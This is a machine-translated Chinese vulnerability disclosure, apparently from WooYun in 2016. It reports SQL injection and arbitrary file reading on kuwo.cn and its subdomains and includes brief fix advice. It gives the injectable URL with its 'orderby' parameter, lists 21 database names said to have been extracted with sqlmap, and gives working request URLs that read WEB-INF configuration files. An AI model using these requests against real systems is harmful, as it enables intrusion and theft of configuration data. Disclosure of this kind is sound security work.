漏洞标题 酷我的主站和10多个子站SQL注入+文件读取 相关制造商 kuwo音乐 漏洞作者 熊猫 提交时间 2016-06-21 16: 06 公共时间 2016-06-27 09: 39 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 该漏洞已通知供应商，但供应商忽略了该漏洞 标签标签 漏洞详细信息 漏洞网站统计信息： http://yule.kuwo.cn/ http://kappa.kuwo.cn/ http://huodong.kuwo.cn/ http://album.kuwo.cn/ http://playlist.kuwo.cn/ http://play.kuwo.cn/ http://changba.kuwo.cn/ http://www.kuwo.cn/ http://tupian.kuwo.cn/ http://hbtv.kuwo.cn/ http://gxtv.kuwo.cn/ http://yinyue.kuwo.cn/ 目前，连接上述主站的12个站点受到影响，可能存在遗漏。 A. SQL注入： http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1 漏洞参数: orderby SQLMAP可以运行数据： 涉及21个数据库： 可用数据库[21]: [*] ACT [*]贝尔 [*]咖啡厅 [*] CONCERT [*] CROWD_FUNDING [*] information_schema [*] KGE [*] KGE_ACT [*] KGECOMMENT [*] KW_TV [*] LISTEN_STORY [*] MANYOU [*] mysql [*]新闻 [*] performance_schema [*] RESWIKI [*]发言人 [*]统计 [*] TAOBAO [*]测试 [*]雅虎 其余站点可以使用sqlmap运行数据，相同的漏洞点，使用SQLMAP证书： 漏洞证明： 其次，读取文件 这是一个历史问题。以前曾提交过白帽，但制造商一直在修复。 主要网站： http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142 http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142 http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142 同样，其他子站点也存在文件读取漏洞，供应商仍在尝试修复它们。 修理计划： 1. SQL注入：对orderby参数进行严格的顺序过滤; 2.文件读取：组合此功能点以确定是否跨目录读取文件。或者使用一种愚蠢的方式来判断诸如./，WEB-INF，jsp $（jsp end）之类的文件是不可读的。 版权声明：请注明源熊猫@乌云